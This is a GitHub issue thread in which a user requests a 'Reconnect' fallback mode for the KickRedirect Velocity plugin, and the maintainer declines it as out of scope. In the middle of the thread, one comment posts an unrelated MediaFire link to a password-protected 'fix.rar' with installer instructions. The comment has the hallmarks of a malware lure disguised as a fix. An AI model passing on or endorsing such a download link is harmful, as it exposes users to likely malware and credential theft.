### ISSUE TITLE
Add "Reconnect" config option

### ISSUE THREAD

**Issue by iiaanloopez** [4drian3d/KickRedirect#94]
RECONNECT: Player will not be disconnected from the server, instead gets a title that says "Reconnecting" with animated dots, if crashed server doesn't go again online the plugin will automatically balance them tough lobbies.
DEFAULT: Normal kick method, after a server crash the plugin will automatically balance all your kicked players.
fallback_mode: RECONNECT

This is from FallBackServer Velocity, using LimboAPI. Same as LimboReconnect

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 4drian3d** [comment]
This function is out of focus of the function of this plugin, you can use as an alternative the plugins you have mentioned
